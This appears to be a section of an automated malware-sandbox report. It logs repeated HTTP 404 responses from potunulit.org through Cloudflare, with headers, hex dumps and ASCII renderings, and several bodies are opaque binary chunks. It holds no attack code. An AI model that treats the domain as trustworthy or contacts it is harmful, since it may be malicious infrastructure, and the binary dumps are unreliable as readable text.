          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F8cFb1Ag5qBQY9lRkQWi5K6Cftpb5LXeW7agILbLK5pNqx7gDOXr8DOwb64RgOO%2F%2B%2Fo%2FJYjWJnjv27o%2FYya3LMbI87MdmnyHGue7OCClBFhd%2BBKsC8ViVQbxdTzLf9gG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47605b8535fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e e1 ea 54 77 7e fc 3d db 2e 07 f1 07 bd db 32 9c 2f 69 13 f0 83 36 3b 0f 9b f2 b0 2c 4d dd f2 3e 40 1e 84 c3 65 b9 85 5b 54 2b fd a4 4f bf 3f f9 58 56 be 86 1c d3 e9 c5 af 0e 1c 26 c4 35 82 fe 74 29 67 3d 8c a3 94 8b b9 2b 9a 0d 2f f7 11 bf 6c 13 d9 e6 58 b6 8b 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cc 00 18 46 b9 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e df f7 ff 78 31 53 db c4 0d 13 13 6b 5e e1 92 24 18 4f c5 03 11 cb a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba f2 96 be 21 51 61 02 fd 38 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 5d e4 0e 98 eb 7e 71 eb 90 f0 1a 88 fa 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 2d b9 ee e6 cc 23 02 64 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 5b e5 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 13 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 99 f2 df 8e 82 11 e8 e4 1f c4 a1 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 0c 03 81 1f d4 ec 68 91 9c 99 04 f1 2c c0 ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 83 0a 1a 16 50 6d 43 cc bd 8b 8b e1 b2 7e d7 9c 8c c3 e0 2b e7 b7 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 ba b6 51 6f ec 8c 1c 8f 38 f5 52 48 24 3e 96 4d d1 e7 17 3f 8e e6 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e b1 f8 af 8e 5a ff c3 a7 de aa ca d4 5f 29 46 43 9c 51 03 62 18 56 1e f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*nTw~=.2/i6;,M>@e[T+O?XV&5t)g=+/lX3Ob>!ZC:>FtSSP*{~x1Sk^$Oa~i~]DzN,!Qa8|(kJk?a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYfItLvwmQjgr9T8ujSYloaH72fpVPWWZn59k6bZx18UuttH4o92OEE%2Fp6EqChDtZqKHR%2BEoHWBNxrsK6z20WtVJ7QA287bvdLqiiYWpfKNvaHuYxcwaGTEQrn1RsDof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4763d89935fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zgAw%2BlUJztsSJARnRnHkwWF6t4U9iHjagH3QHSkLoWQoL9%2BsGIpwOqLjvmt1xuvJ%2FjFJ3iry%2FRsccu5h7eAhQ1A%2FtuUh5m3ZGNCPSxPBeQcDK2GyjGqgPRaJGtR1Jfg7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47655a9235fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 35 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ce f5 ee 60 d7 6a f8 09 7b 3a 03 c5 a7 a9 df 06 3c 3b 7c 27 52 97 32 0f af 8f e0 84 e3 59 d9 c6 a7 c0 e2 b0 2a 71 bd b1 dc 86 55 c9 8a 5b bb 0b 47 1e d7 8a 65 08 d7 dd 65 bb 14 28 86 d0 31 b6 5e 60 28 53 9d 98 a7 a0 36 f8 37 33 ac 3b f3 25 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 a4 7d 9d 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c9 f6 ff 78 bb 49 db c4 0d 13 13 d9 67 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 fa e8 96 be 21 51 61 d8 0b 35 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 72 e5 0e f4 eb 7e 71 eb 10 e8 1a b8 84 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 8b 37 b9 36 e1 cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 23 f6 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 7f 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 41 e0 de 8e 82 11 e8 e4 1f d2 a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 7c fb 9e 1f d4 fc 69 91 9c 03 0f f1 2c ce af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 1c a6 8b 8b e1 f2 67 d7 9c a8 c3 e0 2b 13 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 65 0c f5 52 48 74 27 96 4d e5 e7 17 3f 06 ef 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 7d75`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`j{:<;|'R2Y*qU[Gee(1^`(S673;%p"XJ3Ob>!ZC:>}tSSP*{~xIg$Oa~i~]DzN,!Qa5|(kJ
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q2CqCppgNg5u4Kzx7p9ljU8Xm78OHNBFBvb%2F7GbqAQ6NigIH4oN1ra6uQsuHaukr5bFVzWTQtKVJtNGRRTk6ZBGQ%2FYFEo4opTItOfBuHGa2J0HwT3QgsMNvI6NOeSaSo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e476fd9f635fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GbB0KSV9wS5oX3hByXp%2BXlDv54KVM8z3ecIfhU1SZ2ioZz90RifupIcYrso77dZcMJ918Io3UPKlCmn0jFnd9sK6J5clO2aCvztTtJVdTLGb3YbW%2FDRvcOvPz0gGDUhT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47745fe335fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KkiFYnKblfQoC%2B0iGgeBn5qKvhOh5uuuZUzvN%2FWITdd%2FUMiRFSnKB1G%2B959dBuZ%2FdCzVL%2FNzLRdCSfzHBtmDGrzDVJLBU3gHW2kr%2FSY94uxBRD4uTniY%2BdK3yeScsZXG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4774e8cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3javejhj1Wg33ArssltZOCA%2B0EzP3KzCIiiR3%2FPFKhBFxt3lkdRhSziou1Meo%2BdK1Cxfb4NXGJBVuhV2NLvsFj36OU%2F6ZNsjxFgMxTRwexHU6EsGKWijQKRRPfijuwr9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e477599cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4a c2 5f 86 07 9c a7 53 f7 67 a3 7d 0a 55 3b e0 64 55 35 df 0b 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:J_Sg}U;dU5ga
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2ySOOfglmvxceTjMZBhxpmfe6ZoC1gLA6qqaJrdXfjNQvZjYy%2FF1wrGpGPvY3vfyIcYBZIDF%2BBH2bfYlzcSMF39Vwcrn7No2%2FC052zj89oy5zfhx8ArQ9YXEufLe4Txb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47baa92f90d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PRFhKQXktepOXkOboyM7pomKXHvtbfN0ONIioaEGgYccDJ0B02EQBbZgaaLYg2XH99yXHF5LAnaj40lqDIH3XecNMupylSXxT6hXbhesaRVEcItaGiIk7Ny8Q%2FDC7M9S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47bbfa7190d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 1a fc 15 6f 36 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6c cd fb 3d 33 d1 b0 77 45 7c 1f 57 44 94 68 84 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 05 12 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 db b0 e6 a1 05 7e de f5 69 49 78 17 ab 5e af 9a 25 1a a8 a0 35 30 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 35 36 76 bf 76 34 fd f8 52 31 52 6c 11 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 00 db 1a c8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 8f 3e e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 f0 9c fc 9d 7f 9f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 5d fc df 8e 82 81 fa e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 a0 98 85 1f d4 7c 7b 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 38 b9 8b 8b e1 d2 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e9 74 e3 52 48 04 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 79 60 fd d4 5f 09 69 43 9c 9f 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3 e8 c8 47 e5 90 7a 9a e8 23 Data Ascii: 37ae`@0,xO}q4 